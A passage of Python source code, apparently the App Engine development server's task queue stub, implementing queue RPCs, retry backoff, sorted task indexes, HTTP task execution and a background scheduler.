self._CheckQueueForRpc(request.queue_name())
self._queues[request.queue_name()] = None
def PauseQueue_Rpc(self, request, response):
"""Implementation of the PauseQueue RPC.
Args:
request: A taskqueue_service_pb.TaskQueuePauseQueueRequest.
response: A taskqueue_service_pb.TaskQueuePauseQueueResponse.
"""
self._CheckQueueForRpc(request.queue_name())
self._queues[request.queue_name()].paused = request.pause()
def PurgeQueue_Rpc(self, request, response):
"""Implementation of the PurgeQueue RPC.
Args:
request: A taskqueue_service_pb.TaskQueuePurgeQueueRequest.
response: A taskqueue_service_pb.TaskQueuePurgeQueueResponse.
"""
self._CheckQueueForRpc(request.queue_name())
self._queues[request.queue_name()].PurgeQueue()
def QueryAndOwnTasks_Rpc(self, request, response):
"""Implementation of the QueryAndOwnTasks RPC.
Args:
request: A taskqueue_service_pb.TaskQueueQueryAndOwnTasksRequest.
response: A taskqueue_service_pb.TaskQueueQueryAndOwnTasksResponse.
"""
self._CheckQueueForRpc(request.queue_name())
self._queues[request.queue_name()].QueryAndOwnTasks_Rpc(request, response)
def ModifyTaskLease_Rpc(self, request, response):
"""Implementation of the ModifyTaskLease RPC.
Args:
request: A taskqueue_service_pb.TaskQueueModifyTaskLeaseRequest.
response: A taskqueue_service_pb.TaskQueueModifyTaskLeaseResponse.
"""
self._CheckQueueForRpc(request.queue_name())
self._queues[request.queue_name()].ModifyTaskLease_Rpc(request, response)
class Retry(object):
"""Task retry caclulator class.
Determines if and when a task should next be run
"""
_default_params = taskqueue_service_pb.TaskQueueRetryParameters()
_default_params.set_min_backoff_sec(0.001)
_default_params.set_max_backoff_sec(3600)
_default_params.set_max_doublings(100000)
def __init__(self, task, queue):
"""Constructor.
Args:
task: A taskqueue_service_pb.TaskQueueQueryTasksResponse_Task instance.
May be None.
queue: A _Queue instance. May be None.
"""
if task is not None and task.has_retry_parameters():
self._params = task.retry_parameters()
elif queue is not None and queue.retry_parameters is not None:
self._params = queue.retry_parameters
else:
self._params = self._default_params
def CanRetry(self, retry_count, age_usec):
"""Computes whether a task can be retried.
Args:
retry_count: An integer specifying which retry this is.
age_usec: An integer specifying the microseconds since the first try.
Returns:
True if a task is eligible for retrying.
"""
if self._params.has_retry_limit() and self._params.has_age_limit_sec():
return (self._params.retry_limit() >= retry_count or
self._params.age_limit_sec() >= _UsecToSec(age_usec))
if self._params.has_retry_limit():
return self._params.retry_limit() >= retry_count
if self._params.has_age_limit_sec():
return self._params.age_limit_sec() >= _UsecToSec(age_usec)
return True
def CalculateBackoffUsec(self, retry_count):
"""Calculates time before the specified retry.
Args:
retry_count: An integer specifying which retry this is.
Returns:
The number of microseconds before a task should be retried.
"""
exponent = min(retry_count - 1, self._params.max_doublings())
linear_steps = retry_count - exponent
min_backoff_usec = _SecToUsec(self._params.min_backoff_sec())
max_backoff_usec = _SecToUsec(self._params.max_backoff_sec())
backoff_usec = min_backoff_usec
if exponent > 0:
backoff_usec *= (2 ** (min(1023, exponent)))
if linear_steps > 1:
backoff_usec *= linear_steps
return int(min(max_backoff_usec, backoff_usec))
class _Queue(object):
"""A Taskqueue Queue.
This class contains all of the properties of a queue and a sorted list of
tasks.
"""
def __init__(self, queue_name, bucket_refill_per_second=DEFAULT_RATE_FLOAT,
bucket_capacity=DEFAULT_BUCKET_SIZE,
user_specified_rate=DEFAULT_RATE, retry_parameters=None,
max_concurrent_requests=None, paused=False,
queue_mode=QUEUE_MODE.PUSH, acl=None,
_testing_validate_state=None):
self.queue_name = queue_name
self.bucket_refill_per_second = bucket_refill_per_second
self.bucket_capacity = bucket_capacity
self.user_specified_rate = user_specified_rate
self.retry_parameters = retry_parameters
self.max_concurrent_requests = max_concurrent_requests
self.paused = paused
self.queue_mode = queue_mode
self.acl = acl
self._testing_validate_state = _testing_validate_state
self.task_name_archive = set()
self._sorted_by_name = []
self._sorted_by_eta = []
self._sorted_by_tag = []
self._lock = threading.Lock()
def VerifyIndexes(self):
"""Ensures that all three indexes are in a valid state.
This method is used by internal tests and should not need to be called in
any other circumstances.
Raises:
AssertionError: if the indexes are not in a valid state.
"""
assert self._IsInOrder(self._sorted_by_name)
assert self._IsInOrder(self._sorted_by_eta)
assert self._IsInOrder(self._sorted_by_tag)
tasks_by_name = set()
tasks_with_tags = set()
for name, task in self._sorted_by_name:
assert name == task.task_name()
assert name not in tasks_by_name
tasks_by_name.add(name)
if task.has_tag():
tasks_with_tags.add(name)
tasks_by_eta = set()
for eta, name, task in self._sorted_by_eta:
assert name == task.task_name()
assert eta == task.eta_usec()
assert name not in tasks_by_eta
tasks_by_eta.add(name)
assert tasks_by_eta == tasks_by_name
tasks_by_tag = set()
for tag, eta, name, task in self._sorted_by_tag:
assert name == task.task_name()
assert eta == task.eta_usec()
assert task.has_tag() and task.tag()
assert tag == task.tag()
assert name not in tasks_by_tag
tasks_by_tag.add(name)
assert tasks_by_tag == tasks_with_tags
@staticmethod
def _IsInOrder(l):
"""Determine if the specified list is in ascending order.
Args:
l: The list to check
Returns:
True if the list is in order, False otherwise
"""
sorted_list = sorted(l)
return l == sorted_list
def _WithLock(f):
"""Runs the decorated function within self._lock.
Args:
f: The function to be delegated to. Must be a member function (take self
as the first parameter).
Returns:
The result of f.
"""
def _Inner(self, *args, **kwargs):
with self._lock:
ret = f(self, *args, **kwargs)
if self._testing_validate_state:
self.VerifyIndexes()
return ret
_Inner.__doc__ = f.__doc__
return _Inner
@_WithLock
def UpdateQueue_Rpc(self, request, response):
"""Implementation of the UpdateQueue RPC.
Args:
request: A taskqueue_service_pb.TaskQueueUpdateQueueRequest.
response: A taskqueue_service_pb.TaskQueueUpdateQueueResponse.
"""
assert request.queue_name() == self.queue_name
self.bucket_refill_per_second = request.bucket_refill_per_second()
self.bucket_capacity = request.bucket_capacity()
if request.has_user_specified_rate():
self.user_specified_rate = request.user_specified_rate()
else:
self.user_specified_rate = None
if request.has_retry_parameters():
self.retry_parameters = request.retry_parameters()
else:
self.retry_parameters = None
if request.has_max_concurrent_requests():
self.max_concurrent_requests = request.max_concurrent_requests()
else:
self.max_concurrent_requests = None
self.queue_mode = request.mode()
if request.has_acl():
self.acl = request.acl()
else:
self.acl = None
@_WithLock
def FetchQueues_Rpc(self, request, response):
"""Fills out a queue message on the provided TaskQueueFetchQueuesResponse.
Args:
request: A taskqueue_service_pb.TaskQueueFetchQueuesRequest.
response: A taskqueue_service_pb.TaskQueueFetchQueuesResponse.
"""
response_queue = response.add_queue()
response_queue.set_queue_name(self.queue_name)
response_queue.set_bucket_refill_per_second(
self.bucket_refill_per_second)
response_queue.set_bucket_capacity(self.bucket_capacity)
if self.user_specified_rate is not None:
response_queue.set_user_specified_rate(self.user_specified_rate)
if self.max_concurrent_requests is not None:
response_queue.set_max_concurrent_requests(
self.max_concurrent_requests)
if self.retry_parameters is not None:
response_queue.retry_parameters().CopyFrom(self.retry_parameters)
response_queue.set_paused(self.paused)
if self.queue_mode is not None:
response_queue.set_mode(self.queue_mode)
if self.acl is not None:
response_queue.mutable_acl().CopyFrom(self.acl)
@_WithLock
def QueryTasks_Rpc(self, request, response):
"""Implementation of the QueryTasks RPC.
Args:
request: A taskqueue_service_pb.TaskQueueQueryTasksRequest.
response: A taskqueue_service_pb.TaskQueueQueryTasksResponse.
"""
assert not request.has_start_tag()
if request.has_start_eta_usec():
tasks = self._LookupNoAcquireLock(request.max_rows(),
name=request.start_task_name(),
eta=request.start_eta_usec())
else:
tasks = self._LookupNoAcquireLock(request.max_rows(),
name=request.start_task_name())
for task in tasks:
response.add_task().MergeFrom(task)
@_WithLock
def FetchTask_Rpc(self, request, response):
"""Implementation of the FetchTask RPC.
Args:
request: A taskqueue_service_pb.TaskQueueFetchTaskRequest.
response: A taskqueue_service_pb.TaskQueueFetchTaskResponse.
"""
task_name = request.task_name()
pos = self._LocateTaskByName(task_name)
if pos is None:
if task_name in self.task_name_archive:
error = taskqueue_service_pb.TaskQueueServiceError.TOMBSTONED_TASK
else:
error = taskqueue_service_pb.TaskQueueServiceError.UNKNOWN_TASK
raise apiproxy_errors.ApplicationError(error)
_, task = self._sorted_by_name[pos]
response.mutable_task().add_task().CopyFrom(task)
@_WithLock
def Delete_Rpc(self, request, response):
"""Implementation of the Delete RPC.
Deletes tasks from the task store. We mimic a 1/20 chance of a
TRANSIENT_ERROR when the request has an app_id.
Args:
request: A taskqueue_service_pb.TaskQueueDeleteRequest.
response: A taskqueue_service_pb.TaskQueueDeleteResponse.
"""
for taskname in request.task_name_list():
if request.has_app_id() and random.random() <= 0.05:
response.add_result(
taskqueue_service_pb.TaskQueueServiceError.TRANSIENT_ERROR)
else:
response.add_result(self._DeleteNoAcquireLock(taskname))
def _QueryAndOwnTasksGetTaskList(self, max_rows, group_by_tag, now_eta_usec,
tag=None):
assert self._lock.locked()
if group_by_tag and tag:
return self._IndexScan(self._sorted_by_tag,
start_key=(tag, None, None,),
end_key=(tag, now_eta_usec, None,),
max_rows=max_rows)
elif group_by_tag:
tasks = self._IndexScan(self._sorted_by_eta,
start_key=(None, None,),
end_key=(now_eta_usec, None,),
max_rows=max_rows)
if not tasks:
return []
if tasks[0].has_tag():
tag = tasks[0].tag()
return self._QueryAndOwnTasksGetTaskList(
max_rows, True, now_eta_usec, tag)
else:
return [task for task in tasks if not task.has_tag()]
else:
return self._IndexScan(self._sorted_by_eta,
start_key=(None, None,),
end_key=(now_eta_usec, None,),
max_rows=max_rows)
@_WithLock
def QueryAndOwnTasks_Rpc(self, request, response):
"""Implementation of the QueryAndOwnTasks RPC.
Args:
request: A taskqueue_service_pb.TaskQueueQueryAndOwnTasksRequest.
response: A taskqueue_service_pb.TaskQueueQueryAndOwnTasksResponse.
"""
if self.queue_mode != QUEUE_MODE.PULL:
raise apiproxy_errors.ApplicationError(
taskqueue_service_pb.TaskQueueServiceError.INVALID_QUEUE_MODE)
lease_seconds = request.lease_seconds()
if lease_seconds < 0:
raise apiproxy_errors.ApplicationError(
taskqueue_service_pb.TaskQueueServiceError.INVALID_REQUEST)
max_tasks = request.max_tasks()
if max_tasks <= 0:
raise apiproxy_errors.ApplicationError(
taskqueue_service_pb.TaskQueueServiceError.INVALID_REQUEST)
if request.has_tag() and not request.group_by_tag():
raise apiproxy_errors.ApplicationError(
taskqueue_service_pb.TaskQueueServiceError.INVALID_REQUEST,
'Tag specified, but group_by_tag was not.')
now_eta_usec = _SecToUsec(time.time())
tasks = self._QueryAndOwnTasksGetTaskList(
max_tasks, request.group_by_tag(), now_eta_usec, request.tag())
tasks_to_delete = []
for task in tasks:
retry = Retry(task, self)
if not retry.CanRetry(task.retry_count() + 1, 0):
logging.warning(
'Task %s in queue %s cannot be leased again after %d leases.',
task.task_name(), self.queue_name, task.retry_count())
tasks_to_delete.append(task)
continue
self._PostponeTaskNoAcquireLock(
task, now_eta_usec + _SecToUsec(lease_seconds))
task_response = response.add_task()
task_response.set_task_name(task.task_name())
task_response.set_eta_usec(task.eta_usec())
task_response.set_retry_count(task.retry_count())
if task.has_tag():
task_response.set_tag(task.tag())
task_response.set_body(task.body())
for task in tasks_to_delete:
self._DeleteNoAcquireLock(task.task_name())
@_WithLock
def ModifyTaskLease_Rpc(self, request, response):
"""Implementation of the ModifyTaskLease RPC.
Args:
request: A taskqueue_service_pb.TaskQueueQueryAndOwnTasksRequest.
response: A taskqueue_service_pb.TaskQueueQueryAndOwnTasksResponse.
"""
if self.queue_mode != QUEUE_MODE.PULL:
raise apiproxy_errors.ApplicationError(
taskqueue_service_pb.TaskQueueServiceError.INVALID_QUEUE_MODE)
if self.paused:
raise apiproxy_errors.ApplicationError(
taskqueue_service_pb.TaskQueueServiceError.QUEUE_PAUSED)
lease_seconds = request.lease_seconds()
if lease_seconds < 0:
raise apiproxy_errors.ApplicationError(
taskqueue_service_pb.TaskQueueServiceError.INVALID_REQUEST)
pos = self._LocateTaskByName(request.task_name())
if pos is None:
if request.task_name() in self.task_name_archive:
raise apiproxy_errors.ApplicationError(
taskqueue_service_pb.TaskQueueServiceError.TOMBSTONED_TASK)
else:
raise apiproxy_errors.ApplicationError(
taskqueue_service_pb.TaskQueueServiceError.UNKNOWN_TASK)
_, task = self._sorted_by_name[pos]
if task.eta_usec() != request.eta_usec():
raise apiproxy_errors.ApplicationError(
taskqueue_service_pb.TaskQueueServiceError.TASK_LEASE_EXPIRED)
now_usec = _SecToUsec(time.time())
if task.eta_usec() < now_usec:
raise apiproxy_errors.ApplicationError(
taskqueue_service_pb.TaskQueueServiceError.TASK_LEASE_EXPIRED)
future_eta_usec = now_usec + _SecToUsec(lease_seconds)
self._PostponeTaskNoAcquireLock(
task, future_eta_usec, increase_retries=False)
response.set_updated_eta_usec(future_eta_usec)
@_WithLock
def IncRetryCount(self, task_name):
"""Increment the retry count of a task by 1.
Args:
task_name: The name of the task to update.
"""
pos = self._LocateTaskByName(task_name)
assert pos is not None, (
'Task does not exist when trying to increase retry count.')
task = self._sorted_by_name[pos][1]
self._IncRetryCount(task)
def _IncRetryCount(self, task):
assert self._lock.locked()
retry_count = task.retry_count()
task.set_retry_count(retry_count + 1)
@_WithLock
def GetTasksAsDicts(self):
"""Gets all of the tasks in this queue.
Returns:
A list of dictionaries, where each dictionary contains one task's
attributes. E.g.
[{'name': 'task-123',
'queue_name': 'default',
'url': '/update',
'method': 'GET',
'eta': '2009/02/02 05:37:42',
'eta_delta': '0:00:06.342511 ago',
'body': '',
'headers': [('user-header', 'some-value')
('X-AppEngine-QueueName': 'update-queue'),
('X-AppEngine-TaskName': 'task-123'),
('X-AppEngine-TaskRetryCount': '0'),
('X-AppEngine-Development-Payload': '1'),
('Content-Length': 0),
('Content-Type': 'application/octet-stream')]
Raises:
ValueError: A task request contains an unknown HTTP method type.
"""
tasks = []
now = datetime.datetime.utcnow()
for _, _, task_response in self._sorted_by_eta:
tasks.append(QueryTasksResponseToDict(
self.queue_name, task_response, now))
return tasks
@_WithLock
def GetTaskAsDict(self, task_name):
"""Gets a specific task from this queue.
Returns:
A dictionary containing one task's attributes. E.g.
[{'name': 'task-123',
'queue_name': 'default',
'url': '/update',
'method': 'GET',
'eta': '2009/02/02 05:37:42',
'eta_delta': '0:00:06.342511 ago',
'body': '',
'headers': [('user-header', 'some-value')
('X-AppEngine-QueueName': 'update-queue'),
('X-AppEngine-TaskName': 'task-123'),
('X-AppEngine-TaskRetryCount': '0'),
('X-AppEngine-Development-Payload': '1'),
('Content-Length': 0),
('Content-Type': 'application/octet-stream')]
Raises:
ValueError: A task request contains an unknown HTTP method type.
"""
task_responses = self._LookupNoAcquireLock(maximum=1, name=task_name)
if not task_responses:
return
task_response, = task_responses
if task_response.task_name() != task_name:
return
now = datetime.datetime.utcnow()
return QueryTasksResponseToDict(self.queue_name, task_response, now)
@_WithLock
def PurgeQueue(self):
"""Removes all content from the queue."""
self._sorted_by_name = []
self._sorted_by_eta = []
self._sorted_by_tag = []
@_WithLock
def _GetTasks(self):
"""Helper method for tests returning all tasks sorted by eta.
Returns:
A list of taskqueue_service_pb.TaskQueueQueryTasksResponse_Task objects
sorted by eta.
"""
return self._GetTasksNoAcquireLock()
def _GetTasksNoAcquireLock(self):
"""Helper method for tests returning all tasks sorted by eta.
Returns:
A list of taskqueue_service_pb.TaskQueueQueryTasksResponse_Task objects
sorted by eta.
"""
assert self._lock.locked()
tasks = []
for eta, task_name, task in self._sorted_by_eta:
tasks.append(task)
return tasks
def _InsertTask(self, task):
"""Insert a task into the store, keeps lists sorted.
Args:
task: the new task.
"""
assert self._lock.locked()
eta = task.eta_usec()
name = task.task_name()
bisect.insort_left(self._sorted_by_eta, (eta, name, task))
if task.has_tag():
bisect.insort_left(self._sorted_by_tag, (task.tag(), eta, name, task))
bisect.insort_left(self._sorted_by_name, (name, task))
self.task_name_archive.add(name)
@_WithLock
def PostponeTask(self, task, new_eta_usec):
"""Postpone the task to a future time and increment the retry count.
Args:
task: The TaskQueueQueryTasksResponse_Task to postpone. This must be
stored in this queue (otherwise an AssertionError is raised).
new_eta_usec: The new eta to set on the task. This must be greater then
the current eta on the task.
"""
assert new_eta_usec > task.eta_usec()
self._PostponeTaskNoAcquireLock(task, new_eta_usec)
def _PostponeTaskNoAcquireLock(self, task, new_eta_usec,
increase_retries=True):
assert self._lock.locked()
if increase_retries:
self._IncRetryCount(task)
name = task.task_name()
eta = task.eta_usec()
assert self._RemoveTaskFromIndex(
self._sorted_by_eta, (eta, name, None), task)
if task.has_tag():
assert self._RemoveTaskFromIndex(
self._sorted_by_tag, (task.tag(), eta, name, None), task)
self._PostponeTaskInsertOnly(task, new_eta_usec)
def _PostponeTaskInsertOnly(self, task, new_eta_usec):
assert self._lock.locked()
task.set_eta_usec(new_eta_usec)
name = task.task_name()
bisect.insort_left(self._sorted_by_eta, (new_eta_usec, name, task))
if task.has_tag():
tag = task.tag()
bisect.insort_left(self._sorted_by_tag, (tag, new_eta_usec, name, task))
@_WithLock
def Lookup(self, maximum, name=None, eta=None):
"""Lookup a number of sorted tasks from the store.
If 'eta' is specified, the tasks are looked up in a list sorted by 'eta',
then 'name'. Otherwise they are sorted by 'name'. We need to be able to
sort by 'eta' and 'name' because tasks can have identical eta. If you had
20 tasks with the same ETA, you wouldn't be able to page past them, since
the 'next eta' would give the first one again. Names are unique, though.
Args:
maximum: the maximum number of tasks to return.
name: a task name to start with.
eta: an eta to start with.
Returns:
A list of up to 'maximum' tasks.
Raises:
ValueError: if the task store gets corrupted.
"""
return self._LookupNoAcquireLock(maximum, name, eta)
def _IndexScan(self, index, start_key, end_key=None, max_rows=None):
"""Return the result of a 'scan' over the given index.
The scan is inclusive of start_key and exclusive of end_key. It returns at
most max_rows from the index.
Args:
index: One of the index lists, eg self._sorted_by_tag.
start_key: The key to start at.
end_key: Optional end key.
max_rows: The maximum number of rows to yield.
Returns:
a list of up to 'max_rows' TaskQueueQueryTasksResponse_Task instances from
the given index, in sorted order.
"""
assert self._lock.locked()
start_pos = bisect.bisect_left(index, start_key)
end_pos = INF
if end_key is not None:
end_pos = bisect.bisect_left(index, end_key)
if max_rows is not None:
end_pos = min(end_pos, start_pos + max_rows)
end_pos = min(end_pos, len(index))
tasks = []
for pos in xrange(start_pos, end_pos):
tasks.append(index[pos][-1])
return tasks
def _LookupNoAcquireLock(self, maximum, name=None, eta=None, tag=None):
assert self._lock.locked()
if tag is not None:
return self._IndexScan(self._sorted_by_tag,
start_key=(tag, eta, name,),
end_key=('%s\x00' % tag, None, None,),
max_rows=maximum)
elif eta is not None:
return self._IndexScan(self._sorted_by_eta,
start_key=(eta, name,),
max_rows=maximum)
else:
return self._IndexScan(self._sorted_by_name,
start_key=(name,),
max_rows=maximum)
@_WithLock
def Count(self):
"""Returns the number of tasks in the store."""
return len(self._sorted_by_name)
@_WithLock
def OldestTask(self):
"""Returns the task with the oldest eta in the store."""
if self._sorted_by_eta:
return self._sorted_by_eta[0][2]
return None
@_WithLock
def Oldest(self):
"""Returns the oldest eta in the store, or None if no tasks."""
if self._sorted_by_eta:
return self._sorted_by_eta[0][0]
return None
def _LocateTaskByName(self, task_name):
"""Locate the index of a task in _sorted_by_name list.
If the task does not exist in the list, return None.
Args:
task_name: Name of task to be located.
Returns:
Index of the task in _sorted_by_name list if task exists,
None otherwise.
"""
assert self._lock.locked()
pos = bisect.bisect_left(self._sorted_by_name, (task_name,))
if (pos >= len(self._sorted_by_name) or
self._sorted_by_name[pos][0] != task_name):
return None
return pos
@_WithLock
def Add(self, request, now):
"""Inserts a new task into the store.
Args:
request: A taskqueue_service_pb.TaskQueueAddRequest.
now: A datetime.datetime object containing the current time in UTC.
Raises:
apiproxy_errors.ApplicationError: If a task with the same name is already
in the store, or the task is tombstoned.
"""
if self._LocateTaskByName(request.task_name()) is not None:
raise apiproxy_errors.ApplicationError(
taskqueue_service_pb.TaskQueueServiceError.TASK_ALREADY_EXISTS)
if request.task_name() in self.task_name_archive:
raise apiproxy_errors.ApplicationError(
taskqueue_service_pb.TaskQueueServiceError.TOMBSTONED_TASK)
now_sec = calendar.timegm(now.utctimetuple())
task = taskqueue_service_pb.TaskQueueQueryTasksResponse_Task()
task.set_task_name(request.task_name())
task.set_eta_usec(request.eta_usec())
task.set_creation_time_usec(_SecToUsec(now_sec))
task.set_retry_count(0)
task.set_method(request.method())
if request.has_url():
task.set_url(request.url())
for keyvalue in request.header_list():
header = task.add_header()
header.set_key(keyvalue.key())
header.set_value(keyvalue.value())
if request.has_description():
task.set_description(request.description())
if request.has_body():
task.set_body(request.body())
if request.has_crontimetable():
task.mutable_crontimetable().set_schedule(
request.crontimetable().schedule())
task.mutable_crontimetable().set_timezone(
request.crontimetable().timezone())
if request.has_retry_parameters():
task.mutable_retry_parameters().CopyFrom(request.retry_parameters())
if request.has_tag():
task.set_tag(request.tag())
self._InsertTask(task)
@_WithLock
def Delete(self, name):
"""Deletes a task from the store by name.
Args:
name: the name of the task to delete.
Returns:
TaskQueueServiceError.UNKNOWN_TASK: if the task is unknown.
TaskQueueServiceError.INTERNAL_ERROR: if the store is corrupted.
TaskQueueServiceError.TOMBSTONED: if the task was deleted.
TaskQueueServiceError.OK: otherwise.
"""
return self._DeleteNoAcquireLock(name)
def _RemoveTaskFromIndex(self, index, index_tuple, task):
"""Remove a task from the specified index.
Args:
index: The index list that needs to be mutated.
index_tuple: The tuple to search for in the index.
task: The task instance that is expected to be stored at this location.
Returns:
True if the task was successfully removed from the index, False otherwise.
"""
assert self._lock.locked()
pos = bisect.bisect_left(index, index_tuple)
if index[pos][-1] is not task:
logging.debug('Expected %s, found %s', task, index[pos][-1])
return False
index.pop(pos)
return True
def _DeleteNoAcquireLock(self, name):
assert self._lock.locked()
pos = self._LocateTaskByName(name)
if pos is None:
if name in self.task_name_archive:
return taskqueue_service_pb.TaskQueueServiceError.TOMBSTONED_TASK
else:
return taskqueue_service_pb.TaskQueueServiceError.UNKNOWN_TASK
old_task = self._sorted_by_name.pop(pos)[-1]
eta = old_task.eta_usec()
if not self._RemoveTaskFromIndex(
self._sorted_by_eta, (eta, name, None), old_task):
return taskqueue_service_pb.TaskQueueServiceError.INTERNAL_ERRROR
if old_task.has_tag():
tag = old_task.tag()
if not self._RemoveTaskFromIndex(
self._sorted_by_tag, (tag, eta, name, None), old_task):
return taskqueue_service_pb.TaskQueueServiceError.INTERNAL_ERRROR
return taskqueue_service_pb.TaskQueueServiceError.OK
@_WithLock
def Populate(self, num_tasks):
"""Populates the store with a number of tasks.
Args:
num_tasks: the number of tasks to insert.
"""
def RandomTask():
"""Creates a new task and randomly populates values."""
assert self._lock.locked()
task = taskqueue_service_pb.TaskQueueQueryTasksResponse_Task()
task.set_task_name(''.join(random.choice(string.ascii_lowercase)
for x in range(20)))
task.set_eta_usec(now_usec + random.randint(_SecToUsec(-10),
_SecToUsec(600)))
task.set_creation_time_usec(min(now_usec, task.eta_usec()) -
random.randint(0, _SecToUsec(20)))
task.set_url(random.choice(['/a', '/b', '/c', '/d']))
if random.random() < 0.2:
task.set_method(
taskqueue_service_pb.TaskQueueQueryTasksResponse_Task.POST)
task.set_body('A' * 2000)
else:
task.set_method(
taskqueue_service_pb.TaskQueueQueryTasksResponse_Task.GET)
task.set_retry_count(max(0, random.randint(-10, 5)))
if random.random() < 0.3:
random_headers = [('nexus', 'one'),
('foo', 'bar'),
('content-type', 'text/plain'),
('from', 'user@email.com')]
for _ in xrange(random.randint(1, 4)):
elem = random.randint(0, len(random_headers)-1)
key, value = random_headers.pop(elem)
header_proto = task.add_header()
header_proto.set_key(key)
header_proto.set_value(value)
return task
now_usec = _SecToUsec(time.time())
for _ in range(num_tasks):
self._InsertTask(RandomTask())
class _TaskExecutor(object):
"""Executor for a task object.
Converts a TaskQueueQueryTasksResponse_Task into a http request, then uses the
httplib library to send it to the http server.
"""
def __init__(self, default_host):
"""Constructor.
Args:
default_host: a string to use as the host/port to connect to if the host
header is not specified in the task.
"""
self._default_host = default_host
def _HeadersFromTask(self, task, queue):
"""Constructs the http headers for the given task.
This function will remove special headers (values in BUILT_IN_HEADERS) and
add the taskqueue headers.
Args:
task: The task, a TaskQueueQueryTasksResponse_Task instance.
queue: The queue that this task belongs to, an _Queue instance.
Returns:
A tuple of (header_dict, headers), where:
header_dict: A mapping from lowercase header name to a list of values.
headers: a list of tuples containing the http header and value. There
may be be mutiple entries with the same key.
"""
headers = []
header_dict = {}
for header in task.header_list():
header_key_lower = header.key().lower()
if header_key_lower not in BUILT_IN_HEADERS:
headers.append((header.key(), header.value()))
header_dict.setdefault(header_key_lower, []).append(header.value())
headers.append(('X-AppEngine-QueueName', queue.queue_name))
headers.append(('X-AppEngine-TaskName', task.task_name()))
headers.append(('X-AppEngine-TaskRetryCount', str(task.retry_count())))
headers.append(('X-AppEngine-Fake-Is-Admin', '1'))
headers.append(('Content-Length', str(len(task.body()))))
if 'content-type' not in header_dict:
headers.append(('Content-Type', 'application/octet-stream'))
return header_dict, headers
def ExecuteTask(self, task, queue):
"""Construct a http request from the task and dispatch it.
Args:
task: The task to convert to a http request and then send. An instance of
taskqueue_service_pb.TaskQueueQueryTasksResponse_Task
queue: The queue that this task belongs to. An instance of _Queue.
Returns:
If the task was successfully executed.
"""
try:
method = task.RequestMethod_Name(task.method())
header_dict, headers = self._HeadersFromTask(task, queue)
connection_host, = header_dict.get('host', [self._default_host])
if connection_host is None:
logging.error('Could not determine where to send the task "%s" '
'(Url: "%s") in queue "%s". Treating as an error.',
task.task_name(), task.url(), queue.queue_name)
return False
connection = httplib.HTTPConnection(connection_host)
connection.putrequest(
method, task.url(),
skip_host='host' in header_dict,
skip_accept_encoding='accept-encoding' in header_dict)
for header_key, header_value in headers:
connection.putheader(header_key, header_value)
connection.endheaders()
if task.has_body():
connection.send(task.body())
response = connection.getresponse()
response.read()
response.close()
return 200 <= response.status < 300
except (httplib.HTTPException, socket.error):
logging.exception('An error occured while sending the task "%s" '
'(Url: "%s") in queue "%s". Treating as a task error.',
task.task_name(), task.url(), queue.queue_name)
return False
class _BackgroundTaskScheduler(object):
"""The task scheduler class.
This class is designed to be run in a background thread.
Note: There must not be more than one instance of _BackgroundTaskScheduler per
group.
"""
def __init__(self, group, task_executor, retry_seconds, **kwargs):
"""Constructor.
Args:
group: The group that we will automatically execute tasks from. Must be an
instance of _Group.
task_executor: The class used to convert a task into a http request. Must
be an instance of _TaskExecutor.
retry_seconds: The number of seconds to delay a task by if its execution
fails.
_get_time: a callable that returns the current time in seconds since the
epoch. This argument may only be passed in by keyword. If unset, use
time.time.
"""
self._group = group
self._should_exit = False
self._next_wakeup = INF
self._event = threading.Event()
self._wakeup_lock = threading.Lock()
self.task_executor = task_executor
self.default_retry_seconds = retry_seconds
self._get_time = kwargs.pop('_get_time', time.time)
if kwargs:
raise TypeError('Unknown parameters: %s' % ', '.join(kwargs))
def UpdateNextEventTime(self, next_event_time):
"""Notify the TaskExecutor of the closest event it needs to process.
Args:
next_event_time: The time of the event in seconds since the epoch.
"""
with self._wakeup_lock:
if next_event_time < self._next_wakeup:
self._next_wakeup = next_event_time
self._event.set()
def Shutdown(self):
"""Request this TaskExecutor to exit."""
self._should_exit = True
self._event.set()
def _ProcessQueues(self):
with self._wakeup_lock:
self._next_wakeup = INF
now = self._get_time()
queue, task = self._group.GetNextPushTask()
while task and _UsecToSec(task.eta_usec()) <= now:
if task.retry_count() == 0:
task.set_first_try_usec(_SecToUsec(now))
task_result = self.task_executor.ExecuteTask(task, queue)
now = self._get_time()
if task_result:
queue.Delete(task.task_name())
else:
retry = Retry(task, queue)
age_usec = _SecToUsec(now) - task.first_try_usec()
if retry.CanRetry(task.retry_count() + 1, age_usec):
retry_usec = retry.CalculateBackoffUsec(task.retry_count() + 1)
logging.warning(
'Task %s failed to execute. This task will retry in %.3f seconds',
task.task_name(), _UsecToSec(retry_usec))
queue.PostponeTask(task, _SecToUsec(now) + retry_usec)
else:
logging.warning(
'Task %s failed to execute. The task has no remaining retries. '
'Failing permanently after %d retries and %d seconds',
task.task_name(), task.retry_count(), _UsecToSec(age_usec))
queue.Delete(task.task_name())
queue, task = self._group.GetNextPushTask()
if task:
with self._wakeup_lock:
eta = _UsecToSec(task.eta_usec())
if eta < self._next_wakeup:
self._next_wakeup = eta
def _Wait(self):
"""Block until we need to process a task or we need to exit."""
now = self._get_time()
while not self._should_exit and self._next_wakeup > now:
timeout = self._next_wakeup - now
self._event.wait(timeout)
self._event.clear()
now = self._get_time()
def MainLoop(self):
"""The main loop of the scheduler."""
while not self._should_exit:
self._ProcessQueues()
self._Wait()
class TaskQueueServiceStub(apiproxy_stub.APIProxyStub):
"""Python only task queue service stub.
This stub executes tasks when enabled by using the dev_appserver's AddEvent
capability. When task running is disabled this stub will store tasks for
display on a console, where the user may manually execute the tasks.
"""
def __init__(self,
service_name='taskqueue',
root_path=None,
auto_task_running=False,
task_retry_seconds=30,
_all_queues_valid=False,
default_http_server=None,
_testing_validate_state=False):
"""Constructor.
Args:
service_name: Service name expected for all calls.
root_path: Root path to the directory of the application which may contain
a queue.yaml file. If None, then it's assumed no queue.yaml file is
available.
auto_task_running: When True, the dev_appserver should automatically
run tasks after they are enqueued.
task_retry_seconds: How long to wait between task executions after a
task fails.
_testing_validate_state: Should this stub and all of its _Groups (and
thus and all of its _Queues) validate their state after each
operation? This should only be used during testing of the
taskqueue_stub.
"""
super(TaskQueueServiceStub, self).__init__(
service_name, max_request_size=MAX_REQUEST_SIZE)
self._queues = {}
self._all_queues_valid = _all_queues_valid
self._root_path = root_path
self._testing_validate_state = _testing_validate_state
self._queues[None] = _Group(
self._ParseQueueYaml, app_id=None,
_all_queues_valid=_all_queues_valid,
_update_newest_eta=self._UpdateNextEventTime,
_testing_validate_state=self._testing_validate_state)
self._auto_task_running = auto_task_running
self._started = False
self._task_scheduler = _BackgroundTaskScheduler(
